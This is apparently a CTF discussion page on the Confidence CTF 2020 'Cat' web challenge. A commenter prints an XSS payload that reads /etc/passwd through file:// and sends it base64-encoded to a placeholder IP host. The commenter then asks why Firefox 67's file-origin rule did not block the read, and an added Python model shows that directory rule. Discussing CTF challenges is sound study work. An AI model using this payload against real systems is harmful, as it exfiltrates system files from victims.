Tags: ssrf directorylisting xss 

Original writeup (https://d1r3wolf.blogspot.com/2020/03/confidence-ctf-2020-cat-web-challenge.html).
iv4n, March 16, 2020, 6:23 a.m.

I noticed an issue: in Firefox, starting in Gecko 1.9, the file protocol's SOP requires the files to be read to be in the same directory or in a subdirectory.

But I just tested the challenge server:

```
file:///app/templates/index.html?grey","status":"ok","content":["\"><script>fetch('file:///etc/passwd').then(r=>r.text()).then(data=>fetch('http://IP/'%2Bbtoa(data)))</script>
```

iv4n, March 16, 2020, 6:25 a.m.

(The content has been truncated)

It's ok to read /etc/passwd

The Firefox on the challenge server is version 67; it should ban the request to file:///etc/passwd, so why?
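The directory-based file:// rule the comments refer to, as an added model (not code from this page, and not Firefox's own implementation): a page loaded from file:///dir/page.html may read only files in /dir/ or its subdirectories, so file:///etc/passwd is cross-origin for file:///app/templates/index.html. Path normalisation of `..` segments and the handling of directory-listing URIs are this example's own assumptions about the rule, stated in the comments.

```python
"""Model of the directory-based same-origin rule for file:// URIs.

Added illustration: a file:// page may read another file only if the
directory containing the page is an ancestor of (or equal to) the target's
directory. Not Firefox's implementation; the traversal normalisation and
directory-listing handling below are assumptions of this model.
"""
import posixpath
from urllib.parse import unquote, urlparse


def _file_path(uri: str):
    """Return (normalised absolute path, is_directory) for a file:// URI.

    Returns None for any other scheme, which is always cross-origin.
    """
    parts = urlparse(uri)
    if parts.scheme != "file":
        return None
    raw = unquote(parts.path) or "/"
    # Collapse '.' and '..' so a traversal such as /dir/../etc cannot escape.
    return posixpath.normpath(raw), raw.endswith("/")


def file_read_allowed(page_uri: str, target_uri: str) -> bool:
    """True if the directory rule lets page_uri read target_uri."""
    page, target = _file_path(page_uri), _file_path(target_uri)
    if page is None or target is None:
        return False
    page_path, page_is_dir = page
    target_path, _ = target
    # Origin directory: the page's own directory for a directory listing,
    # otherwise the directory that contains the page file.
    origin_dir = page_path if page_is_dir else posixpath.dirname(page_path)
    origin_dir = origin_dir.rstrip("/") + "/"
    # Allowed: the directory itself or anything beneath it. The trailing
    # slash stops /app/templates-old/ from matching /app/templates/.
    return target_path == origin_dir.rstrip("/") or target_path.startswith(origin_dir)


if __name__ == "__main__":
    # Constructed inputs mirroring the comment's scenario.
    page = "file:///app/templates/index.html?grey"
    for target in ("file:///etc/passwd", "file:///app/templates/base.html"):
        print(target, "allowed" if file_read_allowed(page, target) else "blocked")
```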